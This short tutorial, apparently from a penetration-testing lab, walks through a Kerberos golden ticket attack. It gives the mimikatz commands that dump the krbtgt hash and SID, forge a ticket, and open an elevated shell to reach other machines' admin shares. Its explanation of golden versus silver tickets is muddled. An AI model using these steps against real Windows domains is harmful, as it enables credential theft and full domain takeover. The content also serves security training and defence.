A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket, you would dump any service or domain admin ticket. This will provide you with the service/domain admin account's SID or security identifier that is a unique identifier for each user account, as well as the NTLM hash. You then use these details inside of a mimikatz golden ticket attack in order to create a TGT that impersonates the given service account information.
Using mimikatz.exe, we gonna dump the krbtgt hash and sid.
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
Now generate golden ticket using krbtgt hash and sid.
kerberos::golden /user: /domain: /sid: /krbtgt: /id:
NOTE: id is set to 500 for golden ticket attack.
Use the Golden Ticket to access other machine.
This will open a new command prompt with elevated privileges to all machines.
misc::cmd
Access other Machines! - You will now have another command prompt with access to all other machines on the network.
dir \\DESKTOP-1\c$